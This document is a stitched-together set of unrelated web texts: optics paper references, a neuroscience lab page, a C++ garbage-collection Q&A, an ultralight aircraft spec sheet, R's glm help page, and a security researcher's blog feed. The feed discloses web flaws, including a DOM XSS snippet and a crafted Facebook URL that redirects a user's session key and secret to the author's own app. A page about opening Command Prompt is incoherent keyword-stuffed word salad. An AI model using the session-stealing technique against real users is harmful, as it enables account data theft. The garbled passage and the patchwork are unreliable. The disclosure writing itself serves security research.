limits of coherence-gated imaging in scattering media,�?? Appl. Opt. 36, 2979-2983 (1997). [CrossRef] [PubMed] 15. A. D. Kim and M. Moscoso, �??Backscattering of circularly polarized pulses,�?? Opt. Lett. 27, 1589�??1591 (2002). [CrossRef] 16. I. M. Stockford, S. P. Morgan, P. C. Y. Chang, and J. G. Walker, "Analysis of the spatial distribution of polarized light backscattered from layered scattering media," J. Biomed. Opt. 7, 313-320(2002) [CrossRef] [PubMed] 17. H. J. van Staveren, C. J. M. Moes, J. van Marle, S. A. Prahl, and M. J. C. van Gemert, "Light scattering in Intralipid-10% in the wavelength range of 400-1100nm," Appl. Opt. 30, 4507-4514(1991). [CrossRef] [PubMed] 18. N. Ghosh, H. S. Patel, and P. K. Gupta, �??Depolarization of light in tissue phantoms �?? effect of a distribution in the size of scatterers,�?? Opt. Express 11, 2198-2205 (2003). [CrossRef] [PubMed] Cited By Alert me when this paper is cited OSA is able to provide readers links to articles that cite this paper by participating in CrossRef's Cited-By Linking service. CrossRef includes content from more than 3000 publishers and societies. In addition to listing OSA journal articles that cite this paper, citing articles from other participating publishers will also be listed. « Previous Article  |  Next Article » OSA is a member of CrossRef. CrossCheck Deposited
Mark Von Zastrow, MD, PhD Professor Psychiatry 415-476-7855 Linking Cell Signaling and Membrane Traffic Chemical signaling between neurons is mediated by specific membrane-embedded receptors, which also mediate the actions of many therapeutic and abused drugs. Signaling receptors are often targeted to defined microdomains of the plasma membrane, such as synaptic specializations. Receptor targeting is critical for appropriate localization, integration and processing of neural signals. Many signaling receptors are regulated by membrane trafficking, which refers to the movement of receptors from one membrane domain to another via vesicular carriers. Receptor trafficking is critical to the regulation of neural signaling and to certain aspects of signal dissemination. Our laboratory studies mechanisms that mediate and regulate targeting and trafficking of various neural signaling receptors, and we are investigating the physiological functions of specific receptor trafficking mechanisms. We have a major interest in G protein-coupled receptors (GPCRs), the largest family of neural signaling receptors which represent ~1% of transcripts encoded by the human genome and are targets of the majority of therapeutic drugs currently in clinical use. We have focused on opioid neuropeptide receptors because these GPCRs have extremely interesting cell biological properties, which we believe are important to understanding the physiological effects of addictive opiate drugs. We have observed that distinct GPCRs, even those that are identical in other properties, can differ profoundly in their membrane trafficking. Differences in the membrane trafficking pathways followed by specific GPCRs have major functional consequences to cellular signal transduction, and we are presently studying sorting mechanisms that determine the specificity of receptor trafficking. We are also investigating how non-peptide opiate drugs (such as morphine) differ from endogenously produced neuropeptides (such as endorphins and enkephalins) in their effects on opioid receptor trafficking, and we are investigating the significance of these differences to the analgesic and addictive properties of opiates. We are interested in the membrane trafficking of ligand-gated ion channels, an important class of neural signaling receptors which mediate rapid synaptic neurotransmission. Both AMPA and NMDA -type glutamate receptors are targeted to postsynaptic specializations of excitatory synapses but follow different membrane trafficking pathways, both for their regulated insertion to and removal from the plasma membrane. We have been particularly interested in endocytic mechanisms that remove glutamate receptors from the plasma membrane and, in collaboration with Roger Nicoll's group, have explored how regulated endocytosis specifically of AMPA -type glutamate receptors modulates synaptic plasticity in hippocampal pyramidal neurons. Recently we have become interested in how membrane trafficking mechanisms integrate distinct signals in the same neuron. We have observed a previously unanticipated link between neurotrophin signaling (via receptor tyrosine kinases) and trafficking of G protein-coupled opioid neuropeptide receptors through the biosynthetic pathway. This pathway mediates the formation of an intracellular 'reserve' pool of opioid receptors, packaged into what appears to be a novel population of vesicles, which are rapidly inserted to the neuronal plasma membrane in response to electrical stimulation. Many of our studies are conducted using mammalian cell culture preparations and apply a variety of biochemical and molecular biological methods to elucidate specific mechanisms of receptor membrane trafficking. We are adapting and refining newer gene expression and cellular imaging methods to investigate regulated trafficking of opioid receptors in intact neural tissue, where it is feasible to investigate the effects of receptor trafficking on the regulation of neural circuits. We are also working to develop improved methods for investigating functional effects of specific receptor trafficking mechanisms on whole-animal physiology and behavior. Lab Members Roshanak Irannejad, PhD Postdoctoral Fellow [email protected] Damien Jullie, PhD Postdoctoral Fellow [email protected] Elaine Lau, PhD Postdoctoral Fellow [email protected] Braden Lobingier, PhD Postdoctoral Fellow [email protected] Miriam Stoeber, PhD Postdoctoral Fellow [email protected] Nina (Nikoleta Tsvetanova), PhD Postdoctoral Fellow [email protected] Yasunori Uchida, PhD Postdoctoral Fellow [email protected] Aaron Marley Lab Manager [email protected] Thanh Lam Administrative Assistant [email protected] Lab Website
Tell me more × Programmers Stack Exchange is a question and answer site for professional programmers interested in conceptual questions about software development. It's 100% free, no registration required. I'm interested in a rough measure (percentage-wise) of how many use garbage collection, such as the Boehm collector, with standard C++. Under what circumstances would you use garbage collection, and when wouldn't you, with C++? Are there other alternatives? share|improve this question   See the subjective guidelines; in particular, multiple choice questions aren't good. –  Roger Pate Nov 1 '10 at 16:22   @Roger: I hope for a bunch of very non-subjective, factual answers. I think it would be perhaps be premature to ask for experiences, typical application areas, so on. Although that may fall out of this? –  Alf P. Steinbach Nov 1 '10 at 16:26 add comment 2 Answers I use garbage collection with smart pointers (Boost's shared_ptr). It's mostly used for large objects that are shared throughout the system. It encourages passing the pointer around and ensures the object is destroyed at some point. I also use the shared pointers with a publish/subscribe type system. Mostly because I don't know how many handlers are going to have access to the same event pointer and I don't have a definite lifetime for that event. I will admit that using the shared pointers for the objects has caused more trouble than help at certain points. Mostly because these objects have a clear and definite time of destruction/creation and there's no need for them to be garbage collected. In fact, it keeps hiding errors where an object is holding onto a subsystem for too long and the subsystems are being destroyed in the incorrect order. I have never used a garbage collector similar to the one that's used for Java. Didn't know those existed. share|improve this answer   Thanks for your response. I added a link to the Wikipedia article on the Boehm collector, in the question. Cheers, –  Alf P. Steinbach Nov 1 '10 at 17:01 add comment I have, but at least for me it seemed to cause more problems than it solved. Using GC with C++ basically makes it much more like other languages that use GC -- in particular, you lose the deterministic destruction of objects that's (more or less) necessary for RAII to work correctly. This, in turn, means that when (for example) you want to destroy something deterministically, you need to do so explicitly like you do in something like Java. IMO, that's somewhat clumsy in Java -- but much more so in C++, since it lacks a finally clause for the purpose. Under normal circumstances, you can use a dtor and RAII to provide all the capabilities of a finally clause, but the whole problem here is that with GC you no longer get that. That means almost any time you want to destroy something deterministically, you need to do so explicitly and throw (pun noted by not intended) in extra try/catch clauses to ensure that it happens no matter how you exit the area where you needed the resource. In the end, it comes down to one thing: at least for me, GC accomplishes next to nothing, because intelligent use of container classes has basically eliminated memory management problems without it. RAII allows me to manage memory and virtually all other resources cleanly. Using GC means 1) the memory isn't managed as well (memory footprint is generally considerably larger), and 2) I have to go back to managing other resources manually. share|improve this answer   Eh, you're doing it wrong. You don't lose deterministic destruction; local objects still go out of scope when functions return etc. "GC" merely simulates infinite memory, that's true - but that's true in all GC languages. –  MSalters Nov 25 '10 at 11:01 add comment Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
Main Menu Tennessee Propellers Scout   Tennessee Propellers of Normandy, Tennessee, is a company better known for their wooden maple laminate aircraft propellers, but the company also acted as the exclusive distributor for the Zenoah G-25 and G-50 line of engines. To compliment these product lines they developed the Scout powered parachute which is powered by the 45 hp (34 kW) G-50 driving a Tennessee propeller.   The Scout was designed to comply with the US FAR 103 Ultralight Vehicles rules, including the category's maximum empty weight of 254 lb (115 kg). The aircraft has a standard empty weight of 225 lb (102 kg). It features a parachute-style high-wing, single-place accommodation, tricycle landing gear and a single G-50 engine in pusher configuration. The 50 hp (37 kW) Rotax 503 engine was a factory option.   The aircraft carriage is built from powder coated welded 6061-T6 aluminum tubing and is a highly simplified design compared to other powered parachutes. In flight steering is accomplished via foot pedals that actuate the canopy brakes, creating roll and yaw. On the ground the same foot pedals control the nosewheel steering. The main landing gear incorporates fiberglass spring rod suspension. Standard equipment factory provided included a large canopy-stowage bag, electric engine starting, flight instruments and a four-point pilot harness.   The Scout was supplied as a complete ready-to-fly aircraft, introduced in 1999, but is no longer available. Unit cost in 2001 was US$10,000.   Engine: 1 × Zenoah G-50, 45 hp (34 kW) Wing area: 400 sq ft (37 sq.m) Empty weight: 225 lb (102 kg) Gross weight: 485 lb (220 kg) Fuel capacity: 5 U.S. gallons (19 L; 4.2 imp gal) Cruise speed: 25 mph (40 km/h; 22 kn) Rate of climb: 400 ft/min (2.0 m/s) Wing loading: 1.21 lb/sq ft (5.9 kg/sq.m) Crew: one         Copyright © 2021 all-aero. All Rights Reserved. Joomla! is Free Software released under the GNU General Public License.
Open Command Prompt Here This tech-recipe describes how to open a command prompt by right clicking on folder in explorer creators update version 1703 build 15063 (in actual starting build 14986), pushing powershell the. The tutorial has been updated include information an means running administrator, something require. I frequently find myself with Windows, wishing have the same working directory insert easily terminal context menu explorer can current keyboard shortcut 7? is there implement this? think autohotkey could do this, but don. Am aware of Power Toys Command restore missing here menu. Every Windows power user knows that Command Prompt window is often quickest way get things done skip content. For some tasks, fact, it s only way follow us on. How to Open Command Prompt Windows 10 8 7 Vista XP Here ramesh srinivasan founded winhelponline. Much time, opening as regular all you need com back 2005. Sometimes, though, you’ll need an administrator so administrator privileges. Around forever, and it’s still great resource at your disposal install software, mode admin free download here, many more programs building relationships. Today we’re showing different ways open that why we are oldest successful postgresql company north america. How Open Elevated 8 Information A entry point for typing computer commands Co information about Windows maintain profitability. Archived from groups microsoft show (run administrator) instead default without administrator. Public 10, 8, 7, vista, xp. Windowsxp you before executing command. General 1 use often, little trick location prompt, contents displayed in. Start, Run, Type cmd insider preview 14986 removes here” replaces window. Exe, press enter admin windows? clicking win+x click (admin) 10. 3 Ways to Open the Command Prompt in Windows wikiHow 2 8. Programs, Accessories, Prompt 1 comm as title suggests, t prompt, no idea this be, m ve tried regularly, admin. Ways download 0. Feature 7 provides MS‑DOS (Microsoft Disk Operating System) other commands application allows folder. Tutorial where windows 10 steps pictures hello, recently upgraded creators update since then option file explorer allowed me that. Decades, you’ve able hold down [Shift] Right-Click (or background folder) “Open here don’t know workflow developer, switching forward between shell. Small tip launch, run or elevated CMD administrative privileges & rights 10/8/7 for. Microsoft provide hidden function allow any want vista. Extension Visual Studio - Opens line root project force it down. Support consoles such CMD, PowerShell, Bash etc lifewire a. Provides syntax launch directly br an. If selects Here system menu, will be displayed, Enable Window Here” Option Context Menu Vista Later In later, if key right wikihow teaches program there several simply. Creators Update version 1703 build 15063 (in actual starting Build 14986), pushing PowerShell the
PDA View Full Version : Local Redirect Macman1993 Jun 6, 2012, 09:54 PM I apologize for sounding incredibly stupid here I have no idea what the name of what I'm trying to do is, I do understand networks and computers better than this post makes it seem. At my school we have a feature where certain addresses would redirect to a specific web page on campus. So for example typing "library" would bring you to my schools library website. I would like to do something like this at my house for things like my DVR. I would like to be able to simply type "dvr" into my address bar and be brought to my dvr web interface. Does anyone have experience doing this and could they please give me some (just the actual name of this process would be nice) information that would help me figure out what I need to do. Thanks macman2023 Jul 10, 2012, 04:15 PM Hi, local DNS is probably what your school was using. It can be setup easily if you have a router with DD-WRT or OpenWRT, and some higher grade off the shelf routers may include the option. If you want to do this and avoid putting DD-WRT or OpenWRT on a router yourself for the first time (which can be a little unnerving if you are not fairly techy). Netgear and Buffalo both sell routers that have the DD-WRT loaded from the factory but only on certain models specifically labeled. Lastly, this could be done in a little more dirty way but would still work fine, you could edit your host file manually, but this would need to be done on each computer or device and would only work locally unless you additionally had a static IP or a DDNS service to help maintain connection from abroad (not sure if this is an issue from your post, but many users are wanting to access their systems and information remotely these days).
glm {stats}R Documentation Fitting Generalized Linear Models Description glm is used to fit generalized linear models, specified by giving a symbolic description of the linear predictor and a description of the error distribution. Usage glm(formula, family = gaussian, data, weights, subset, na.action, start = NULL, etastart, mustart, offset, control = list(...), model = TRUE, method = "glm.fit", x = FALSE, y = TRUE, singular.ok = TRUE, contrasts = NULL, ...) glm.fit(x, y, weights = rep.int(1, nobs), start = NULL, etastart = NULL, mustart = NULL, offset = rep.int(0, nobs), family = gaussian(), control = list(), intercept = TRUE, singular.ok = TRUE) ## S3 method for class 'glm' weights(object, type = c("prior", "working"), ...) Arguments formula an object of class "formula" (or one that can be coerced to that class): a symbolic description of the model to be fitted. The details of model specification are given under ‘Details’. family a description of the error distribution and link function to be used in the model. For glm this can be a character string naming a family function, a family function or the result of a call to a family function. For glm.fit only the third option is supported. (See family for details of family functions.) data an optional data frame, list or environment (or object coercible by as.data.frame to a data frame) containing the variables in the model. If not found in data, the variables are taken from environment(formula), typically the environment from which glm is called. weights an optional vector of ‘prior weights’ to be used in the fitting process. Should be NULL or a numeric vector. subset an optional vector specifying a subset of observations to be used in the fitting process. na.action a function which indicates what should happen when the data contain NAs. The default is set by the na.action setting of options, and is na.fail if that is unset. The ‘factory-fresh’ default is na.omit. Another possible value is NULL, no action. Value na.exclude can be useful. start starting values for the parameters in the linear predictor. etastart starting values for the linear predictor. mustart starting values for the vector of means. offset this can be used to specify an a priori known component to be included in the linear predictor during fitting. This should be NULL or a numeric vector of length equal to the number of cases. One or more offset terms can be included in the formula instead or as well, and if more than one is specified their sum is used. See model.offset. control a list of parameters for controlling the fitting process. For glm.fit this is passed to glm.control. model a logical value indicating whether model frame should be included as a component of the returned value. method the method to be used in fitting the model. The default method "glm.fit" uses iteratively reweighted least squares (IWLS): the alternative "model.frame" returns the model frame and does no fitting. User-supplied fitting functions can be supplied either as a function or a character string naming a function, with a function which takes the same arguments as glm.fit. If specified as a character string it is looked up from within the stats namespace. x, y For glm: logical values indicating whether the response vector and model matrix used in the fitting process should be returned as components of the returned value. For glm.fit: x is a design matrix of dimension n * p, and y is a vector of observations of length n. singular.ok logical; if FALSE a singular fit is an error. contrasts an optional list. See the contrasts.arg of model.matrix.default. intercept logical. Should an intercept be included in the null model? object an object inheriting from class "glm". type character, partial matching allowed. Type of weights to extract from the fitted model object. Can be abbreviated. ... For glm: arguments to be used to form the default control argument if it is not supplied directly. For weights: further arguments passed to or from other methods. Details A typical predictor has the form response ~ terms where response is the (numeric) response vector and terms is a series of terms which specifies a linear predictor for response. For binomial and quasibinomial families the response can also be specified as a factor (when the first level denotes failure and all others success) or as a two-column matrix with the columns giving the numbers of successes and failures. A terms specification of the form first + second indicates all the terms in first together with all the terms in second with any duplicates removed. A specification of the form first:second indicates the set of terms obtained by taking the interactions of all terms in first with all terms in second. The specification first*second indicates the cross of first and second. This is the same as first + second + first:second. The terms in the formula will be re-ordered so that main effects come first, followed by the interactions, all second-order, all third-order and so on: to avoid this pass a terms object as the formula. Non-NULL weights can be used to indicate that different observations have different dispersions (with the values in weights being inversely proportional to the dispersions); or equivalently, when the elements of weights are positive integers w_i, that each response y_i is the mean of w_i unit-weight observations. For a binomial GLM prior weights are used to give the number of trials when the response is the proportion of successes: they would rarely be used for a Poisson GLM. glm.fit is the workhorse function: it is not normally called directly but can be more efficient where the response vector, design matrix and family have already been calculated. If more than one of etastart, start and mustart is specified, the first in the list will be used. It is often advisable to supply starting values for a quasi family, and also for families with unusual links such as gaussian("log"). All of weights, subset, offset, etastart and mustart are evaluated in the same way as variables in formula, that is first in data and then in the environment of formula. For the background to warning messages about ‘fitted probabilities numerically 0 or 1 occurred’ for binomial GLMs, see Venables & Ripley (2002, pp. 197–8). Value glm returns an object of class inheriting from "glm" which inherits from the class "lm". See later in this section. If a non-standard method is used, the object will also inherit from the class (if any) returned by that function. The function summary (i.e., summary.glm) can be used to obtain or print a summary of the results and the function anova (i.e., anova.glm) to produce an analysis of variance table. The generic accessor functions coefficients, effects, fitted.values and residuals can be used to extract various useful features of the value returned by glm. weights extracts a vector of weights, one for each case in the fit (after subsetting and na.action). An object of class "glm" is a list containing at least the following components: coefficients a named vector of coefficients residuals the working residuals, that is the residuals in the final iteration of the IWLS fit. Since cases with zero weights are omitted, their working residuals are NA. fitted.values the fitted mean values, obtained by transforming the linear predictors by the inverse of the link function. rank the numeric rank of the fitted linear model. family the family object used. linear.predictors the linear fit on link scale. deviance up to a constant, minus twice the maximized log-likelihood. Where sensible, the constant is chosen so that a saturated model has deviance zero. aic A version of Akaike's An Information Criterion, minus twice the maximized log-likelihood plus twice the number of parameters, computed via the aic component of the family. For binomial and Poison families the dispersion is fixed at one and the number of parameters is the number of coefficients. For gaussian, Gamma and inverse gaussian families the dispersion is estimated from the residual deviance, and the number of parameters is the number of coefficients plus one. For a gaussian family the MLE of the dispersion is used so this is a valid value of AIC, but for Gamma and inverse gaussian families it is not. For families fitted by quasi-likelihood the value is NA. null.deviance The deviance for the null model, comparable with deviance. The null model will include the offset, and an intercept if there is one in the model. Note that this will be incorrect if the link function depends on the data other than through the fitted mean: specify a zero offset to force a correct calculation. iter the number of iterations of IWLS used. weights the working weights, that is the weights in the final iteration of the IWLS fit. prior.weights the weights initially supplied, a vector of 1s if none were. df.residual the residual degrees of freedom. df.null the residual degrees of freedom for the null model. y if requested (the default) the y vector used. (It is a vector even for a binomial model.) x if requested, the model matrix. model if requested (the default), the model frame. converged logical. Was the IWLS algorithm judged to have converged? boundary logical. Is the fitted value on the boundary of the attainable values? call the matched call. formula the formula supplied. terms the terms object used. data the data argument. offset the offset vector used. control the value of the control argument used. method the name of the fitter function used (when provided as a character string to glm()) or the fitter function (when provided as that). contrasts (where relevant) the contrasts used. xlevels (where relevant) a record of the levels of the factors used in fitting. na.action (where relevant) information returned by model.frame on the special handling of NAs. In addition, non-empty fits will have components qr, R and effects relating to the final weighted linear fit. Objects of class "glm" are normally of class c("glm", "lm"), that is inherit from class "lm", and well-designed methods for class "lm" will be applied to the weighted linear model at the final iteration of IWLS. However, care is needed, as extractor functions for class "glm" such as residuals and weights do not just pick out the component of the fit with the same name. If a binomial glm model was specified by giving a two-column response, the weights returned by prior.weights are the total numbers of cases (factored by the supplied case weights) and the component y of the result is the proportion of successes. Fitting functions The argument method serves two purposes. One is to allow the model frame to be recreated with no fitting. The other is to allow the default fitting function glm.fit to be replaced by a function which takes the same arguments and uses a different fitting algorithm. If glm.fit is supplied as a character string it is used to search for a function of that name, starting in the stats namespace. The class of the object return by the fitter (if any) will be prepended to the class returned by glm. Author(s) The original R implementation of glm was written by Simon Davies working for Ross Ihaka at the University of Auckland, but has since been extensively re-written by members of the R Core team. The design was inspired by the S function of the same name described in Hastie & Pregibon (1992). References Dobson, A. J. (1990) An Introduction to Generalized Linear Models. London: Chapman and Hall. Hastie, T. J. and Pregibon, D. (1992) Generalized linear models. Chapter 6 of Statistical Models in S eds J. M. Chambers and T. J. Hastie, Wadsworth & Brooks/Cole. McCullagh P. and Nelder, J. A. (1989) Generalized Linear Models. London: Chapman and Hall. Venables, W. N. and Ripley, B. D. (2002) Modern Applied Statistics with S. New York: Springer. See Also anova.glm, summary.glm, etc. for glm methods, and the generic functions anova, summary, effects, fitted.values, and residuals. lm for non-generalized linear models (which SAS calls GLMs, for ‘general’ linear models). loglin and loglm (package MASS) for fitting log-linear models (which binomial and Poisson GLMs are) to contingency tables. bigglm in package biglm for an alternative way to fit GLMs to large datasets (especially those with many cases). esoph, infert and predict.glm have examples of fitting binomial GLMs. Examples ## Dobson (1990) Page 93: Randomized Controlled Trial : counts <- c(18,17,15,20,10,20,25,13,12) outcome <- gl(3,1,9) treatment <- gl(3,3) data.frame(treatment, outcome, counts) # showing data glm.D93 <- glm(counts ~ outcome + treatment, family = poisson()) anova(glm.D93) summary(glm.D93) ## Computing AIC [in many ways]: (A0 <- AIC(glm.D93)) (ll <- logLik(glm.D93)) A1 <- -2*c(ll) + 2*attr(ll, "df") A2 <- glm.D93$family$aic(counts, mu=fitted(glm.D93), wt=1) + 2 * length(coef(glm.D93)) stopifnot(exprs = { all.equal(A0, A1) all.equal(A1, A2) all.equal(A1, glm.D93$aic) }) ## an example with offsets from Venables & Ripley (2002, p.189) utils::data(anorexia, package = "MASS") anorex.1 <- glm(Postwt ~ Prewt + Treat + offset(Prewt), family = gaussian, data = anorexia) summary(anorex.1) # A Gamma example, from McCullagh & Nelder (1989, pp. 300-2) clotting <- data.frame( u = c(5,10,15,20,30,40,60,80,100), lot1 = c(118,58,42,35,27,25,21,19,18), lot2 = c(69,35,26,21,18,16,13,12,12)) summary(glm(lot1 ~ log(u), data = clotting, family = Gamma)) summary(glm(lot2 ~ log(u), data = clotting, family = Gamma)) ## Aliased ("S"ingular) -> 1 NA coefficient (fS <- glm(lot2 ~ log(u) + log(u^2), data = clotting, family = Gamma)) tools::assertError(update(fS, singular.ok=FALSE), verbose=interactive()) ## -> .. "singular fit encountered" ## Not run: ## for an example of the use of a terms object as a formula demo(glm.vr) ## End(Not run) [Package stats version 4.5.0 Index]
Security Thoughts http://www.wisec.it/sectou.php Security Thoughts en Expression Language Injection Think about implementing a web application that relies several secrets like anti CRSRF tokens, random seeds used for password generation and so on...<br /> <br /> If the implementation is based on Spring MVC framework and security is important for you, then you should consider reading the paper <a href="http://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf">Expression Language Injection</a> which is the result of a joint research conducted by Stefano Di Paola of Minded Security and Arshan Dabirsiaghi of Aspect Security.<br /> <br /> We tried to identify the security impact of a bug in Spring MVC which could lead to double evaluation of Expression Language if an untrusted input is used as the argument of particular attributes.<br /> ...<br /> <br /> Continue readinng on Minded Security <a href="http://blog.mindedsecurity.com/2011/09/expression-language-injection.html">blog</a>...<br /> http://www.wisec.it/sectou.php?id=4e6e1cae16dc7 Mon, 12 Sep 2011 16:48:00 GMT [Security Song] Help Yourself to My Flaws <p > <br /> These days are quite eventful in the info security world. Several attacks which stole data from Sony, from Citybank and from a bitcoin user.<br><br /> I was pretty shocked.<br><br /> I use to listen to the radio while working, and I felt inspired listening to <a href="http://www.youtube.com/watch?v=3Eh6dwRfUYA" target="_blank"><br /> Help Yourself to my Lips"</a> performed by Tom Jones.<br><br /> I thought: "It just seems like a big web application owner is offering its data to every attacker in the world...".<br><br /> So I decided to rewrite a bit the song and - gh - perform by myself :P..<br><br /> <a href="http://www.wisec.it/HelpYourSelf.php">Enjoy</a><br /> </p><br /> <b>Update: </b><br/><br /> If you enjoyed this, have a look at the new <a href="http://www.wisec.it/AintCodeAKick.php">song</a><br /> http://www.wisec.it/sectou.php?id=4df865b1970df Wed, 15 Jun 2011 09:54:00 GMT God Save The (Omniture) Quine Some weeks ago, while testing a website hosted by a client of ours<br /> with <b>DOMinator</b>, I found that an Omniture Catalyst plugin called<br /> <b>crossVisitParticipation</b> used an eval on a cookie value.<br /> It was a typical '<i>eval(cookieValue)</i>' which is bad from a security<br /> perspective, but there is something more interesting which made me think<br /> to write a post about it, since the attack vector was kind of advanced <br /> and the model here is different from "traditional" meshups.<br /> In fact in the Omniture case, companies have to save an auto generated<br /> JS and host it on their own websites.<br /> This means updates are directly tied to a local site administration<br /> policy, and no real time update is possible.<br /> <br /> Continue reading on <a href="http://blog.mindedsecurity.com/2011/04/god-save-omniture-quine.html">Minded Security Blog</a>..<br /> http://www.wisec.it/sectou.php?id=4dbba4476d78c Sat, 30 Apr 2011 07:50:00 GMT Abusing Referrer on Explorer for Referrer based DOM Xss I don't really know if this is actually known, but I thought it was worth writing.<br /> <br /> In a few words:<br /> While other browsers do not allow particular charaters in sub domains, IE does. Hence it's possible to abuse that behavior to exploit referrer based DOM Xss.<br /> <br /> ..continue reading on <a href="http://blog.mindedsecurity.com/2011/03/abusing-referrer-on-explorer-for.html">Minded Security</a><br /> http://www.wisec.it/sectou.php?id=4d9096a2a5eb5 Mon, 28 Mar 2011 16:08:00 GMT Java DSN Rebinding + Java Same IP Policy = The Internet Mayhem This is a short blog post about what could have happened if a malicious user had exploited the issues I found.<br /> <br /> If someone has read the post about Java DNS Rebinding and Java applet same IP Host Access probably has come <br /> to the same conclusion of what I am going to describe in the next few lines which can be summarized like this:<br /> Java applet implementation could really break the web.<br /> <br /> Consider the following points:<br /> <br /> * Java DNS Rebinding: an attacker can point a controlled host to any IP of the web.<br /> * Java applet same IP Host access: an attacker can read the response of any host which points to the same IP<br /> the applet originates.<br /> <br /> ..Continue reading <a href="http://blog.mindedsecurity.com/2010/10/java-dsn-rebinding-java-same-ip-policy.html">here</a><br /> http://www.wisec.it/sectou.php?id=4cbffce28944d Thu, 21 Oct 2010 10:40:00 GMT Java Applet Same IP Host Access Summary<br /> Due to a design issue on the way Java considers Same Origin Policy, it is possible for an attacker controlling a host with the same IP of the victim host, to forge requests to victim host on behalf of a user and read the content of the response.<br /> <br /> ..Continue reading <a href="http://blog.mindedsecurity.com/2010/10/java-applet-same-ip-host-access.html">here</a><br /> http://www.wisec.it/sectou.php?id=4cbffc65f2a76 Thu, 21 Oct 2010 10:38:00 GMT DNS Rebinding on Java Applets <b>Summary</b><br /> In 2007 it was discovered that Java Applets, in conjunction with LiveConnect plugin on Firefox, were vulnerable to DNS Rebinding and take advantage of Java features like TCP and UDP socket connections on unauthorized sites.<br /> But the only browser which resulted vulnerable was Firefox.<br /> <br /> During an assessment of Java VM source code (v. 6 update 21) it was found that the attack was still feasible, probably due to a regression issue and, more important, I found a way to extend the attack to every browser.<br /> A fix should have been implemented in the new Java 6 update 22.<br /> ...Continue Reading <a href="http://blog.mindedsecurity.com/2010/10/dns-rebinding-on-java-applets.html">here</a><br /> http://www.wisec.it/sectou.php?id=4cbee8ec55251 Wed, 20 Oct 2010 15:03:00 GMT A Twitter DomXss, a wrong fix and something more It seems that twitter new site introduced some issue resulting in a worm exploiting a stored Xss.<br /> They also added some new JavaScript in their pages which I casually saw while searching in the html for the worm payload.<br /> <br /> The code was the following :<br /> <blockquote><br /> //&lt;![CDATA[<br /> (function(g){var a=location.href.split("#!")[1];if(a){g.location=g.HBR=a;}})(window);<br /> //]]&gt;<br /> </blockquote><br /> <br /> Do you spot the issue?<br /> It search for "#!" in the Url and assign the content after that to the window.location object. And it is present in (almost?) every page on twitter.com main site.<br /> <br /> ...Continue the reading on Minded Security blog <a href="http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html">Here</a><br /> http://www.wisec.it/sectou.php?id=4c9b1fe56458c Thu, 23 Sep 2010 11:34:00 GMT Chrome Cross-origin property pollution Last week, while working on the new project about DomXss, I found that Chrome v. 6.0.472.59 <br /> had an issue similar to the opener object on IE7.<br /> Specifically, this can be done in spite of the SOP by creating, from an attacker's page, an IFRAME <br /> with the name of the object the other window is trying to access and the overwriting it using JavaScript.<br /> It works on every window reference. An attacker can trigger a Browser Based DOM Xss which will result <br /> in stealing sensitive data, overwrite SOP protected window objects or execute JavaScript in the context <br /> of a legit page.<br /> <br /> ...Continue reading on Minded Security blog <a href="http://blog.mindedsecurity.com/2010/09/chrome-cross-origin-property-pollution.html">here</a><br /> http://www.wisec.it/sectou.php?id=4c9af670eede0 Thu, 23 Sep 2010 08:37:00 GMT Facebook application hole. A neverending story? It was April 11th @ 9:00 AM,some days before my Campusparty talk, and I decided to have a quick look at Facebook apps howto implementations.<br /> <br /> After some hours of trial and error I understood that an application has almost full access to user data by using <a href="http://wiki.developers.facebook.com/index.php/API">REST-Ful APIs</a>.<br /> <br /> It seems that an application just needs a key called session_key representing the user.<br /> How to get that? Redirecting the user to the facebook page (<a href="http://wiki.developers.facebook.com/index.php/Authentication_and_Authorization_for_Facebook_for_Mobile_Applications">FacebookWiki</a>):<br /> <blockquote><br /> <span>http://www.facebook.com/tos.php?api_key=[AppKey]&moreParameters</span><br /> </blockquote><br /> Which, if user has already subscribed to the application, then it redirects to :<blockquote><br /> <span>http://apps.facebook.com/appPage/?session={"session_key":"2.XXXXXXXXZzHYZaBMEA__.3600.XXXX-XXXXX","uid":XXXXXX,"expires":1271016000,"secret":"XXXXXX","base_domain":"domain.com","sig":"XXXXX"}</span></blockquote><br /> The url where the user is redirected can be set in the '<i>next</i>' parameter (implied in moreParameters).<br /> Now I had to better understand what I can do and went to my favourite FaceBook hacker-superhero The Harmony Guy.<br /> Found <a href="http://theharmonyguy.com/2010/04/10/facebook-platform-vulnerability-enabled-silent-data-harvesting/">this</a>:<br /> <br /> It seems he already found something...and very big! :( Even if I don't know a thing about FBK, I was sooo near!<br /> <br /> The good^N^N^N^NBad thing is that it took me a few hours to study the environment and think about that.<br /> <br /> That's the explaination (from harmony guy link):<br /> <blockquote><br /> "...<br /> But the first main component of the attack involved a slight modification to<br /> the login page URI. By adding a 'next' parameter, once can specify an<br /> alternate landing page for authorized users. Not all applications take<br /> advantage of this parameter, but many do. The parameter would not work <br /> for an arbitrary site, but Facebook previously did allow any URI that began<br /> with apps.facebook.com. Thus one could craft a login page URI that<br /> checked whether the user had authorized one application and then<br /> forward the user to a second application. The next part of the attack came<br /> from adding 'return_session=1' to the login page URI. This parameter<br /> causes Facebook to append particular session variables for the authorized<br /> application onto the URI of the landing page - in our case, the second<br /> application given by the 'next' parameter. That application merely has to<br /> check its address for the session data, which provides enough information<br /> to execute API requests using the credentials of the already authorized<br /> application.<br /> ..."<br /> </blockquote><br /> Now there's something I don't understand, and that's because I'm not a Facebook hacker and because the description is not technical.<br /> They say it's fixed but if I try this request:<br /> <br /> <blockquote><span>http://www.facebook.com/tos.php?api_key=80c6ec6628efd9a465dd223190a65bbc&connect_display=popup&v=1.0&<b>next=../wisectest/</b>&v=1.0&&return_session=true&session_key_only=true&canvas</span></blockquote><br /> using <i><b>farmville api_key</b></i> with <i>next</i> parameter set to my test application home page on apps.facebook.com, I get a redirect to:<br /> <br /> <blockquote><span>http://apps.facebook.com/wisectest/?session={"session_key":"2.XXXXXXXXZzHYZaBMEA__.3600.XXXX-XXXXX","uid":XXXXXX,"expires":1271016000,"secret":"XXXXXX","base_domain":"farmville.com","sig":"XXXXX"}</span></blockquote><br /> <br /> After that the victim seems to be also added my fake test app transparently...<br /> <br /> <img style="display: block;" src="/images/AddApp.jpg"><br /> <br /> <br /> Maybe they fixed on login.php but missed some page?...:o<br /> As usual the infamous question I asked myself a lot of times when a vuln is fixed but the technique has not been understood.<br /> How come that after the "theharmonyguy" post no one @facebook got a deep analysis?<br /> Maybe 